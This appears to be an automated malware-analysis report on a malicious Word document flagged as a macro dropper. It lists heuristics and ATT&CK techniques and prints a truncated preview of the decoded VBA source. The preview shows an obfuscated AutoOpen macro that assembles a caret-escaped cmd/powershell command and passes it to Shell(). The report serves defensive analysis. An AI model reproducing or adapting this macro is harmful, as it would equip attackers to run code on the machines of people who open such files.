Verdict: MALICIOUS
Risk Score: 242

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File

Malware Insights
The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function, as indicated by the OLE_VBA_SHELL and OLE_VBA_PCODE_AUTOEXEC_EXEC heuristics. This function is likely used to execute a downloaded payload, a common technique for malware droppers. The ClamAV detection further confirms its malicious nature.
Heuristics (7)

- ClamAV: Doc.Dropper.Agent-6576077-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6576077-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13882 bytes |

SHA-256: 7ebcc2b7d7894108c50eb0717580ef4710fda78fd7a1aa66a849fe206312bd8b

Preview: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "CcpzIESwlQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function Llqwlpidqi()
On Error Resume Next
RilMp = Tan(dwsZRS _
 * Tan(hImzd * Int(iusHF * Sqr(34019) / wrzDtH + Fix(95730)) / 26170 * Round(72900 / Log(55346 - LEjOi) + 90643 - pDalw)) _
 / 12200 + Log(12486))
RXiZX = Tan(vtllwp _
 * Tan(JUzvfO * Int(ZiQQzD * Sqr(29045) / WMstw + Fix(65440)) / 81048 * Round(49961 / Log(67711 - FrQKu) + 55005 - FXjicq)) _
 / 37009 + Log(83827))
Llqwlpidqi = iuhlLrzA + Shell(QkCKiz + Chr(uDJkT + vbKeyC + llstnqJbV) + DGRIv + BfFfiM + RkZNFOHurVD + VLfaGv + orAdFSHDlVt + tiJJIjXGAan + wovDX + dzijmc, 4373 - 4373)
mjHOb = Tan(RjXYt _
 * Tan(swTuO * Int(aXVOnn * Sqr(66430) / jijtWZ + Fix(3441)) / 54161 * Round(91105 / Log(13533 - Ullaj) + 75827 - jiMZN)) _
 / 76598 + Log(26779))
End Function
Sub Autoopen()
On Error Resume Next
sUzYv = Tan(fjniA _
 * Tan(BTBQCM * Int(tzpwmb * Sqr(31834) / EfHVs + Fix(60967)) / 30188 * Round(62878 / Log(64220 - XLwpBz) + 83778 - JVPcwW)) _
 / 2075 + Log(22285))
Llqwlpidqi
JDXMz = Tan(PbEjNH _
 * Tan(lmUnfA * Int(EvrFCR * Sqr(90514) / bikUjL + Fix(11738)) / 56201 * Round(19048 / Log(31215 - jiNzRi) + 52375 - jcIIq)) _
 / 295 + Log(64821))
End Sub
Attribute VB_Name = "NMSJfkbzV"
Function DGRIv()
On Error Resume Next
cPraG = Tan(DmvcR _
 * Tan(GcJRW * Int(cGJsB * Sqr(24073) / YkWWiv + Fix(31497)) / 19417 * Round(42265 / Log(47527 - ktqRQ) + 93587 - dwddX)) _
 / 38973 + Log(37352))
zBzcYS = "md jf" + "kHMIjziHk jjPvM" + "LiGRdALZt" + "ZPVMp jw" + "ZCtAJ & " + "%^c^"
tlZJkO = Tan(hhYjQQ _
 * Tan(BrkDEj * Int(fKqMZX * Sqr(30561) / vNCCf + Fix(2771)) / 59494 * Round(69792 / Log(23170 - qFMItj) + 62238 - wvmtT)) _
 / 29903 + Log(74191))
JsiNjaFK = "o^m^S^p" + "^E^c^% %^" + "c^o^m^S" + "^p^E^"
NajzK = Tan(ORmKdN _
 * Tan(fWGYPO * Int(PXQGjX * Sqr(51352) / dCtnQ + Fix(15667)) / 75923 * Round(7641 / Log(1807 - dzquW) + 66767 - TQQZf)) _
 / 40455 + Log(8617))
XJQZsnsE = "c^%" + " " + " /V " + " /c " + " " + " set" + " %" + "KdI" + "iqpv"
LHqKc = Tan(mQuok _
 * Tan(qwdsS * Int(JlOkV * Sqr(2623) / ANGJuz + Fix(63863)) / 78509 * Round(73054 / Log(10021 - ztYwr) + 67932 - FmRPWn)) _
 / 47053 + Log(13954))
oMVADiL = "OTmJdYzV%=Ck" + "vmPGkMu&" + "&se" + "t " + "%Iuqj" + "TsuIYk"
LSmal = Tan(ccEjGz _
 * Tan(CcErcv * Int(hMufp * Sqr(29204) / RkrSl + Fix(76276)) / 46356 * Round(41870 / Log(42155 - fPHRvs) + 20839 - wOjoLi)) _
 / 22529 + Log(56065))
RYZvXpZqDk = "m%=p&&set %Xau" + "bvbwGN%=o^w" + "&&set %vzAkq" + "tSKVXcJuJ" + "W%=iGdMiRGLj" + "WR&&set" + " %bSha"
rwYGlW = Tan(LrNNU _
 * Tan(ThGEM * Int(nGmUj * Sqr(4874) / AjcZMH + Fix(15946)) / 9192 * Round(62549 / Log(44205 - ttsiGE) + 59388 - IkvBhG)) _
 / 33535 + Log(97988))
rnlZkkaAc = "QwEZ%" + "=!" + "%IuqjTsuIYkm%!&" + "&set %wOuD" + "tvovrvicsq" + "S%=asGHaYH" + "&&set" + " %IWNPskhFD%=e^" + "r&"
cFioEs = Tan(tiSAG _
 * Tan(HmKJL * Int(UFAhp * Sqr(73353) / IEivTv + Fix(15895)) / 35656 * Round(54918 / Log(51999 - IpBWoY) + 73131 - rvcJrX)) _
 / 90042 + Log(97217))
SrjXb = "&set" + " %NEQjNA" + "DLo%=!%Xa" + "ubvbwGN" + "%!&&set %AYVVJi" + "Xi" + "%=s&&" + "set %lAGAL" + "iqoBTbUwa"
kcXpCJ = Tan(RPmwFz _
 * Tan(iLRAWR * Int(QbvLuw * Sqr(61515) / mXYwdi + Fix(731)) / 6830 * Round(6250 / Log(12559 - SEZlnY) + 88094 - wzaXY)) _
 / 64269 + Log(63674))
oFlqdUzTO = "T%=NGOfj" + "AdkVQNj&" + "&set %zPF" + "KYRjbTF%=he&&se" + "t %OaPslUTD" + "z%=" + "ll&&!%bShaQwEZ" + "%!!%NE" + "QjN" + "ADLo%!!%IWNPs"
DGRIv = zBzcYS + JsiNjaFK + XJQZsnsE + oMVADiL + RYZvXpZqDk + rnlZkkaAc + SrjXb + oFlqdUzTO
End Function
Function BfFfiM()
On Error Resume Next
AbdHL = Tan(VcPaI _
 * Tan(LiIOt * Int(wsrqIm * Sqr(1476) / hwMzzP + Fix(92924)) / 27235 * Round(99798 / Log(53903 - wUPjw) + 42900 - QZpTp)) _
 / 22367 + Log(57298))
ZmpmlsEztSc = "khFD%!!%A" + "YVVJiXi%!!" + "%zPFK" + "YRjbTF%!!%"
iocKSr = Tan(O ...
```

(truncated)